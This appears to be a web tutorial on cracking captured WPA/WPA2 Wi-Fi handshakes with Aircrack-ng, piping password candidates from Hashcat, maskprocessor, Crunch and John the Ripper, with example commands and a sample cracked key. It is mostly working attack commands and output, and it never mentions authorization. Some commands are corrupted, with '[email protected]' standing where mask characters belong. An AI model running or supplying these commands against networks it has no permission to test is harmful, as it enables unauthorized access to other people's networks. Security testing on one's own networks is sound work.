How To Hack WPA/WPA2 Passwords With Aircrack-ng

Hacking WPA/WPA2 passwords with Aircrack-ng: dictionary attack, cooperation with Hashcat, maskprocessor, statsprocessor, John the Ripper, Crunch, hacking in Windows

Successfully captured handshake can be hacked by various programs. If you manage to configure proprietary video card drivers, then, of course, it is recommended using Hashcat to brute-force passwords. The speed of cracking will be much higher.

If you want to brute-force WPA PSK passwords with only the power of the CPU, then Aircrack-ng is one of the suitable programs. Disadvantage of this way it does not use a video card. Another big disadvantage is the lack of support for masks, rules and other brute-force options. Although the last drawback is leveled by the fact that Aircrack-ng can be paired with other programs that support these masks, rules, and password generation on the fly.

Another advantage of the program is that it works fine under Windows.

The easiest way to use Aircrack-ng is:

1 aircrack-ng -w path_to_dictionary -e ESSID handshake.cap

Although the command is simple, we explain that:

  • -w path_to_dictionary is a word list in format one password candidate per line.
  • -e ESSID is the name of the access point (wireless network). If there is information about several access points in the capture file (and usually it happens if you have not previously cleaned this file), then Aircrack-ng will ask for which AP you want to crack the password. Therefore, this option is not mandatory, because the choice can be made after launching the program. Alternatively, you can use the -b option, after which you need to specify the MAC address of the AP.
  • handshake.cap is the file with a captured handshake

So, my dictionary is located in the /home/mial/2ndHDD/newrockyou.txt file, the access point is named dlink , and the handshake file is called dlink-02.cap and is located in the current working directory, then I compose the command:

1 aircrack-ng -w /home/mial/2ndHDD/newrockyou .txt -e dlink dlink-02.cap

Brute-force running:

As you can see, all eight cores of the CPU are fully loaded:

Key found!

This is what the KEY FOUND! inscription tells us.

Aircrack-ng 1.2 rc4
[00:37:08] 7431796/9894689 keys tested (3186.12 k/s)
Time left: 12 minutes, 53 seconds 75.11%
KEY FOUND! [ pattayateam ]
Master Key : D3 AD 16 B8 E1 F9 39 37 99 FE 25 FE EB AA 61 74
9C 81 E1 18 39 82 E9 D3 9F 3B 28 5C 4B FE 67 77
Transient Key : 8C 88 24 58 C7 E3 B2 DC 2C 9C 33 4A 9D 52 70 BA
F1 56 9C 1B 14 46 C5 49 64 AC 1B 6B 6A 81 E4 88
7D D9 F8 25 70 C7 6C 3A 95 04 09 41 33 36 E2 AB
2E D5 90 A4 5F 90 41 ED 3A 54 2F 72 5B 8E BF 89
EAPOL HMAC : AF AD DC CE 9A 1F DF F4 8A 74 28 CC C5 CF 8C 87

Using passwords created in other programs in Aircrack-ng

Aircrack-ng can work with any programs that output passwords to standard output. To do this, use the same -w option, but instead of specifying the path to the dictionary, you need to put a dash ( - ). And pass the passwords themselves via a pipe ( | ) from the generator program to Aircrack-ng. In general, the command looks like this:

1 password_generator | aircrack-ng -w - -e ESSID handshake.cap

Using Hashcat generated passwords in Aircrack-ng

In order not to crack passwords, but only to show candidates, Hashcat has an option –stdout

We also need to specify the hacking mode (option -a ) and the mask itself.

  # | Mode
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
- [ Built-in Charsets ] -
  ? | Charset
  l | abcdefghijklmnopqrstuvwxyz
  d | 0123456789
  h | 0123456789abcdef
  H | 0123456789ABCDEF
  s |  !"#$%&'()*+,-./:;<=>[email protected][\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff

As a result, the command to display passwords looks like this:

1 hashcat --stdout -a 3 pattaya?l?l?l?l


  • –stdout means only show passwords candidates.
  • -a 3 means that mask attack is selected
  • pattaya?l?l?l?l is the mask itself. All passwords created at the beginning of the word will have pattaya, and then there will be four small letters. It is recommended that you familiarize yourself with the rules for creating masks for Hashcat:

The command to transfer generated passwords from hashcat to aircrack-ng for my data looks like this:

1 hashcat --stdout -a 3 pattaya?l?l?l?l | aircrack-ng -w - -e dlink dlink-02.cap

Aircrack-ng and maskprocessor collaboration

The maskprocessor program is part of the hashcat package. Its purpose is to generate candidates for passwords by mask. Using maskprocessor is even easier than hashcat itself, which without the necessary dependencies will not even start on some systems.

The command syntax is very simple:

1 maskprocessor MASK

For example, for my matched password, the mask could be pattaya?l?l?l?l. Check:

1 maskprocessor pattaya?l?l?l?l | aircrack-ng -w - -e dlink dlink-02.cap

Cracking started:


Aircrack-ng and statsprocessor collaboration

Statsprocessor is another program that comes with Hashcat. Statsprocessor is a high-performance word generator, based on Markov’s positional attack, packed in a separate executable file.

Hacking Wi-Fi in Aircrack-ng with Crunch-generated passwords on the fly

Crunch is a dictionary generator with passwords in which you can define a standard or specified encoding. Crunch can create a list of words with all sorts of combinations and permutations in accordance with specified criteria. The data that crunch prints can be displayed on the screen, saved to a file, or transferred to another program.

A simple example of use:

1 crunch <minimum-length> <maximum-length> [character set ]

In general, Crunch is a very flexible program, and in order to use it 100% you need to study its options and familiarize yourself with the examples. You can find various examples of crunch usage on the page:

For my case it would be possible to do this:

1 crunch 11 11 -t [email protected]@@@ | aircrack-ng -w - -e dlink dlink-02.cap

Or so:

1 crunch 11 11 -t @@@@@@@@@@@ | aircrack-ng -w - -e dlink dlink-02.cap

Hacking Wi-Fi Passwords in Aircrack-ng with John the Ripper

John the Ripper supports the output of candidates (option –stdout ), as well as various rules for generating passwords. John the Ripper has its own syntax, but in general, you can achieve the same result as with the programs already reviewed. Therefore, if you are more familiar with John the Ripper, you can use it in commands like this:

1 . /john --wordlist=<wordlist> --rules --stdout | aircrack-ng -e <ESSID> -w - <capture>

Hacking WPA passwords with Aircrack-ng in Windows

Since the Aircrack-ng package is cross-platform, it is possible to hack WPA handshake in Windows. Go to the official website, download the version for Windows, unzip the downloaded archive.

Change to the directory where the executable file aircrack-ng-avx.exe is located (your path will be different):

1 cd C:\Users\Alex\Downloads\aircrack-ng-1.2-rc4-win\bin\64bit\

An example of starting hacking:

1 aircrack-ng-avx.exe -w D:\newrockyou.txt -e dlink dlink-02.cap


  • -w D:\newrockyou.txt is the path to the dictionary;
  • -e dlink is selected access point for hacking
  • dlink-02.cap is the file with the captured handshake, is placed in the same folder as the executable file.


By the way, you will find three similar files:

  • aircrack-ng-avx.exe
  • aircrack-ng-avx2.exe
  • aircrack-ng-sse2.exe

Try them all - they will have different performance, and some may not start.


Aircrack-ng combines well with password generators and can work under Windows. However, much greater results can be obtained by cracking the password using a graphics card (GPU cracking).

Source: miloserdov

Happy learning